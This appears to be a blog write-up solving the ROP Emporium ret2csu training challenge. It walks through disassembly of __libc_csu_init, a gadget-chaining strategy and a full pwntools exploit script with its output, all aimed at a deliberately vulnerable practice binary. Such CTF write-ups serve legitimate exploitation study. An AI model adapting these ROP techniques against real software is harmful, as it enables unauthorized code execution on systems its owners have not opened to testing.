Rop Emporium ret2csu - (Almost) No Gadgets

after fusion , i have been doing the x64 challenges of ROP Emporium to get a refresher on 64bit exploitation , including calling conventions and other details , and this challenge just seemed interesting enough to do a short write-up about.

context

the challenge is a 64 bit binary , I ran it on a vm with ASLR enabled , here's the fusion-style summary:

	Setting
Vulnerability Type	Stack
Position Independent Executable	No
Read only relocations	Partial
Non-Executable stack	Yes
Non-Executable heap	Yes
Address Space Layout Randomisation	Yes
Source Fortification	N/A

Analysis

the challenges source code are not provided , but everything is compiled with debug symbols so it's just as good , in this challenge , we have the usual ROP Emporium vulnerable function pwnme , both of which are contained in a libret2csu.so file liked to the binary .
the goal is to call a ret2win function with the right arguments so we can get the flag , for the sake of saving time , i will only be discussing the code of ret2win , pwnme is just vanilla stack buffer overflow with nothing special , only thing to to note is that the rop chain starts at offset 40 in the input

ret2win source

thanks to ida :

void __fastcall __noreturn ret2win(__int64 a1, __int64 a2, __int64 a3)
{
  FILE *stream; // [rsp+20h] [rbp-10h]
  FILE *streama; // [rsp+20h] [rbp-10h]
  int i; // [rsp+2Ch] [rbp-4h]

  if ( a1 == 0xDEADBEEFDEADBEEFLL && a2 == 0xCAFEBABECAFEBABELL && a3 == 0xD00DF00DD00DF00DLL )
  {
    stream = fopen("encrypted_flag.dat", "r");
    if ( !stream )
    {
      puts("Failed to open encrypted_flag.dat");
      exit(1);
    }
    g_buf = (char *)malloc(0x21uLL);
    if ( !g_buf )
    {
      puts("Could not allocate memory");
      exit(1);
    }
    g_buf = fgets(g_buf, 33, stream);
    fclose(stream);
    streama = fopen("key.dat", "r");
    if ( !streama )
    {
      puts("Failed to open key.dat");
      exit(1);
    }
    for ( i = 0; i <= 31; ++i )
      g_buf[i] ^= fgetc(streama);
    *(_QWORD *)(g_buf + 4) ^= 0xDEADBEEFDEADBEEFLL;
    *(_QWORD *)(g_buf + 12) ^= 0xCAFEBABECAFEBABELL;
    *(_QWORD *)(g_buf + 20) ^= 0xD00DF00DD00DF00DLL;
    puts(g_buf);
    exit(0);
  }
  puts("Incorrect parameters");
  exit(1);
}

simple enough , we should provide the right arguments and we'll get the flag , to do this we need to :
- place 0xDEADBEEFDEADBEEFLL in rdi
- place 0xCAFEBABECAFEBABELL in rsi
- place 0xD00DF00DD00DF00DLL in rdx
- call the function via its plt stub

__libc_csu_init

the difficulty arises from the fact that we don't really have a lot of gadgets , we only be using the gadgets in __libc_csu_init , here's the disassembly :

pwndbg> disassemble __libc_csu_init
Dump of assembler code for function __libc_csu_init:
   0x0000000000400640 <+0>: push   r15
   0x0000000000400642 <+2>: push   r14
   0x0000000000400644 <+4>: mov    r15,rdx
   0x0000000000400647 <+7>: push   r13
   0x0000000000400649 <+9>: push   r12
   0x000000000040064b <+11>:    lea    r12,[rip+0x20079e]        # 0x600df0
   0x0000000000400652 <+18>:    push   rbp
   0x0000000000400653 <+19>:    lea    rbp,[rip+0x20079e]        # 0x600df8
   0x000000000040065a <+26>:    push   rbx
   0x000000000040065b <+27>:    mov    r13d,edi
   0x000000000040065e <+30>:    mov    r14,rsi
   0x0000000000400661 <+33>:    sub    rbp,r12
   0x0000000000400664 <+36>:    sub    rsp,0x8
   0x0000000000400668 <+40>:    sar    rbp,0x3
   0x000000000040066c <+44>:    call   0x4004d0 <_init>
   0x0000000000400671 <+49>:    test   rbp,rbp
   0x0000000000400674 <+52>:    je     0x400696 <__libc_csu_init+86>
   0x0000000000400676 <+54>:    xor    ebx,ebx
   0x0000000000400678 <+56>:    nop    DWORD PTR [rax+rax*1+0x0]
   0x0000000000400680 <+64>:    mov    rdx,r15
   0x0000000000400683 <+67>:    mov    rsi,r14
   0x0000000000400686 <+70>:    mov    edi,r13d
   0x0000000000400689 <+73>:    call   QWORD PTR [r12+rbx*8]
   0x000000000040068d <+77>:    add    rbx,0x1
   0x0000000000400691 <+81>:    cmp    rbp,rbx
   0x0000000000400694 <+84>:    jne    0x400680 <__libc_csu_init+64>
   0x0000000000400696 <+86>:    add    rsp,0x8
   0x000000000040069a <+90>:    pop    rbx
   0x000000000040069b <+91>:    pop    rbp
   0x000000000040069c <+92>:    pop    r12
   0x000000000040069e <+94>:    pop    r13
   0x00000000004006a0 <+96>:    pop    r14
   0x00000000004006a2 <+98>:    pop    r15
   0x00000000004006a4 <+100>:   ret
End of assembler dump.

this is awesome , there are two snippets of this that we will be exploiting :

   0x000000000040069a <+90>:    pop    rbx
   0x000000000040069b <+91>:    pop    rbp
   0x000000000040069c <+92>:    pop    r12
   0x000000000040069e <+94>:    pop    r13
   0x00000000004006a0 <+96>:    pop    r14
   0x00000000004006a2 <+98>:    pop    r15
   0x00000000004006a4 <+100>:   ret

simple , gives us control over all the listed registers , but the problem here is that we don't have control over rdx , which is crucial as without it we cannot pass the third argument to ret2win and get the flag , the attentive reader might have spotted this :

   0x0000000000400680 <+64>:    mov    rdx,r15
   0x0000000000400683 <+67>:    mov    rsi,r14
   0x0000000000400686 <+70>:    mov    edi,r13d
   0x0000000000400689 <+73>:    call   QWORD PTR [r12+rbx*8]

this gives us control over rdx and rsi (since we control both r15 and r14, but there is yet another problem , the instruction mov edi,r13d only modifies half of rdi , and zeroes out the rest , so we need another mechanism to set rdi before calling ret2win .
we can control the call instruction because we control both the register used in it (r12 and rbx), but we should know and address that point to an address that points to some code :

[addr1]->[addr2]->code (push rbp;mov ...)

and more importantly , the code we jump to should ideally act like a ret instruction , i should not modify our register ,not alter stack structure, nor exit , this rules out the only two got entries we have (ret2win and pwnme) , as the former exits on failure and the second does not preserve registers .
the only other functions that we have address-to-address to are the ones in , init and fini symbols , these two are arrays of function pointers used by most c compiler-generated (gcc-clang...) code to make initialization and finalization hooks that are respectively called before main and at program exit , they usually point to addresses dummy functions that do very little , exactly and perfectly what we need.
i got the symbols' addresses by readelf : ``` readelf -a ./ret2csu | grep -iE 'init_array|fini_array' [18] .init_array INIT_ARRAY 0000000000600df0 00000df0 [19] .fini_array FINI_ARRAY 0000000000600df8 00000df8

... `` - looking at the function address pointed to byfini` we have :

pwndbg> x/gx 0x000000000600df8
0x600df8:   0x00000000004005d0
pwndbg> x/10i 0x00000000004005d0
   0x4005d0 <__do_global_dtors_aux>:    cmp    BYTE PTR [rip+0x200a61],0x0        # 0x601038 <completed.7698>
   0x4005d7 <__do_global_dtors_aux+7>:  jne    0x4005f0 <__do_global_dtors_aux+32>
   0x4005d9 <__do_global_dtors_aux+9>:  push   rbp
   0x4005da <__do_global_dtors_aux+10>: mov    rbp,rsp
   0x4005dd <__do_global_dtors_aux+13>: call   0x400560 <deregister_tm_clones>
   0x4005e2 <__do_global_dtors_aux+18>: mov    BYTE PTR [rip+0x200a4f],0x1        # 0x601038 <completed.7698>
   0x4005e9 <__do_global_dtors_aux+25>: pop    rbp
   0x4005ea <__do_global_dtors_aux+26>: ret

i was concerned about the call to deregister_tm_clones but it turned out harmless , this function satisfies all our needs , this behaves virtually like a ret instruction , and will allow us to go past the call seamlessly so we can deal with rdi afterward.
after call , this can be used to set rdi:

   0x00000000004006a3: pop rdi; ret;

exploit stategy

we'll do the following :
call this chain and set the register r13,r14,r15 to our arguments , set rbx to the address of the address of our dummy function and r12 to the rest of the division , and set rbp to rbx + 1 , we will get to why in a second :

   0x000000000040069a <+90>:    pop    rbx
   0x000000000040069b <+91>:    pop    rbp
   0x000000000040069c <+92>:    pop    r12
   0x000000000040069e <+94>:    pop    r13
   0x00000000004006a0 <+96>:    pop    r14
   0x00000000004006a2 <+98>:    pop    r15
   0x00000000004006a4 <+100>:   ret

call this , set rsi and rdx with our previously set r15 and r14 :

   0x0000000000400680 <+64>:    mov    rdx,r15
   0x0000000000400683 <+67>:    mov    rsi,r14
   0x0000000000400686 <+70>:    mov    edi,r13d
   0x0000000000400689 <+73>:    call   QWORD PTR [r12+rbx*8]

after that , the call will be done to the dummy function , but after that we have to go through this code before the next ret :

   0x000000000040068d <+77>:    add    rbx,0x1
   0x0000000000400691 <+81>:    cmp    rbp,rbx
   0x0000000000400694 <+84>:    jne    0x400680 <__libc_csu_init+64>
   0x0000000000400696 <+86>:    add    rsp,0x8
   0x000000000040069a <+90>:    pop    rbx
   0x000000000040069b <+91>:    pop    rbp
   0x000000000040069c <+92>:    pop    r12
   0x000000000040069e <+94>:    pop    r13
   0x00000000004006a0 <+96>:    pop    r14
   0x00000000004006a2 <+98>:    pop    r15
   0x00000000004006a4 <+100>:   ret

this is why we have to set rbp to rbx + 1 , so the instructions add rbx,1;cpm rbp,rbx;jne... don't get execution somewhere else (an infinite loop here) , we need to ensure that rbp is equal to rbx + 1, easily done with the first gadget.
the accumulation of the add and pos instruction increases the stack by 7*8 bytes , so we need to adjust for that in our rop chain
finally in the chain we add the plt address of ret2win , and we get the flag

model

[ overflow ]
     ↓
[ pop rbx rbp r12 r13 r14 r15 ] initialized for us r* regs&rbp
     ↓
[ call gadget ] sets second and third arg
     ↓
call [r12 + rbx*8] goes to dummy func and back
     ↓
[ pop chain again ] with dummy values
     ↓
[ pop rdi ; ret ] sets first arg
     ↓
[ ret2win ]

The Exploit

the full exploit implementing what's above :

from pwn import *
context.terminal = "kitty"


arg1 = 0xDEADBEEFDEADBEEF
arg2 = 0xCAFEBABECAFEBABE
arg3 = 0xD00DF00DD00DF00D

set_rdi = 0x00000000004006a3# pop rdi; ret;

ret2csu_gadget = 0x000000000040069a#pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret;
ret2csu_call_gadget = 0x0000000000400680 #mov rdx,r15;mov rsi,r14;mov edi,r13d;call QWORD PTR [r12+rbx*8]


dummy = 0x000000000600df8
ret2win_plt = 0x400510
set_args_gadget = 0x000000000040093c # pop rdi; pop rsi; pop rdx; ret;


rbx = dummy // 8
rbp = rbx + 1
r12 =  dummy % 8 
r13 = arg1
r14 = arg2
r15 = arg3

ret2csu_chain = bytearray()
ret2csu_chain += p64(ret2csu_gadget)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
ret2csu_chain += p64(ret2csu_call_gadget)
ret2csu_chain += 7*p64(0)
ret2csu_chain += p64(set_rdi)+p64(arg1)
ret2csu_chain += p64(ret2win_plt)



p = process("./ret2csu")
p.send(40*b'A' + ret2csu_chain)
p.interactive()
exit()

running this we get :

❯ python ret2csu_exploit.py
[+] Starting local process './ret2csu': pid 23391
[*] Switching to interactive mode
[*] Process './ret2csu' stopped with exit code 0 (pid 23391)
ret2csu by ROP Emporium
x86_64

Check out https://ropemporium.com/challenge/ret2csu.html for information on how to solve this challenge.

> Thank you!
ROPE{a_placeholder_32byte_flag!}
[*] Got EOF while reading in interactive

Rop Emporium ret2csu - (Almost) No Gadgets

context

Analysis

ret2win source

__libc_csu_init

exploit stategy

model

The Exploit

and voila.